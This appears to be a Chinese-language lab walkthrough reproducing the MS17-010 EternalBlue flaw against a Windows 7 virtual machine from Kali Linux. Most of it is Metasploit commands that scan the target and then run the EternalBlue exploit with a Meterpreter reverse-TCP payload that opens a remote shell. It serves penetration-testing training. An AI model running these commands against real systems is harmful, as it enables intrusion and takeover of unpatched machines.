Windows网络服务渗透测试实战MS17-010漏洞复现

实验目的及要求

熟悉Metasploit终端的使用方;
掌握对MS17-010漏洞攻击的方法;

实验环境配置

安装cali linux 虚拟机
百度网盘提取
提取码:wajd

安装win7虚拟机
百度网盘提取
提取码:wajd

实现步骤

在虚拟机设置网卡模式为Nat模式
必须设置win7和cali linux 为nat模式,分配同网段的ip地址

找出win7和Cali linux的ip地址
Win7:192.168.197.130
win + r 打开命令提示符
输入命令 ipconfig

Cali:192.168.197.129
命令行
输入命令 ip add

1、
进入msf平台
msfconsole
Windows网络服务渗透测试实战MS17-010漏洞复现_第1张图片

2、
搜索漏洞模块
search ms17-010
Windows网络服务渗透测试实战MS17-010漏洞复现_第2张图片

3、
使用扫描模块
use auxiliary/scanner/smb/smb_ms17_010
在这里插入图片描述

4、
查看选项
show options
Windows网络服务渗透测试实战MS17-010漏洞复现_第3张图片

5、
设置
set rhost 192.168.197.130
set rport 445
Windows网络服务渗透测试实战MS17-010漏洞复现_第4张图片

6、
验证
run
Exploit
Windows网络服务渗透测试实战MS17-010漏洞复现_第5张图片

使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述

查看选项
show options
Windows网络服务渗透测试实战MS17-010漏洞复现_第6张图片
9.
设置
set lhost 192.168.197.129
set lport 4444
set rhost 192.168.197.130
set rport 445
set payload windows/x64/meterpreter/reverse_tcp
Windows网络服务渗透测试实战MS17-010漏洞复现_第7张图片
在这里插入图片描述

攻击
run
exploit
Windows网络服务渗透测试实战MS17-010漏洞复现_第8张图片

你可能感兴趣的:(windows,linux,安全)